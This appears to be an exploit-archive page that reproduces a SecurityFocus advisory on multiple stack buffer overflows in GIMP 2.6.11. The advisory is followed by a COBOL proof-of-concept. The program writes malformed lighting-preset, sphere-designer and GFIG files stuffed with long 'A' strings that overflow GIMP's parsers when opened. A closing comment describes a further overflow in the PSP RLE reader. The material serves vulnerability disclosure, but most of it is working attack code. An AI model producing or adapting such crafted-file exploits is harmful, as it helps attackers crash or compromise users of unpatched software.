扫码分享
验证:
体验盒子source: https://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID.GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR.NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150*FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName:Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity:100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern:Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient:FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650OPEN OUTPUT FILE01.
000660WRITE PRINTLINE FROM TEXT-OUT1.
000670WRITE PRINTLINE FROM TEXT-OUT2.
000680WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730WRITE PRINTLINE FROM TEXT-OUT5.
000740WRITE PRINTLINE FROM TEXT-OUT6.
000750WRITE PRINTLINE FROM TEXT-OUT7.
000760WRITE PRINTLINE FROM TEXT-OUT8.
000770CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800OPEN OUTPUT FILE02.
000810WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140WRITE QRINTLINE FROM TEXU-OUT3.
001150CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180OPEN OUTPUT FILE03.
001190WRITE RRINTLINE FROM TEXV-OUT1.
001200WRITE RRINTLINE FROM TEXV-OUT2.
001210WRITE RRINTLINE FROM TEXV-OUT3.
001220WRITE RRINTLINE FROM TEXV-OUT4.
001230WRITE RRINTLINE FROM TEXV-OUT5.
001240WRITE RRINTLINE FROM TEXV-OUT6.
001250WRITE RRINTLINE FROM TEXV-OUT7.
001260WRITE RRINTLINE FROM TEXV-OUT8.
001270WRITE RRINTLINE FROM TEXV-OUT9.
001280WRITE RRINTLINE FROM TEXV-OUTA.
001290WRITE RRINTLINE FROM TEXV-OUTB.
001300WRITE RRINTLINE FROM TEXV-OUTC.
001310WRITE RRINTLINE FROM TEXV-OUTD.
001320WRITE RRINTLINE FROM TEXV-OUTE.
001330WRITE RRINTLINE FROM TEXV-OUTF.
001340WRITE RRINTLINE FROM TEXV-OUTG.
001350WRITE RRINTLINE FROM TEXV-OUTH.
001360WRITE RRINTLINE FROM TEXV-OUTI.
001370WRITE RRINTLINE FROM TEXV-OUTJ.
001380WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420WRITE RRINTLINE FROM TEXV-OUTL.
001430WRITE RRINTLINE FROM TEXV-OUTM.
001440WRITE RRINTLINE FROM TEXV-OUTN.
001450CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480*OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490*STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500*ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520*HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540STOP RUN.
体验盒子
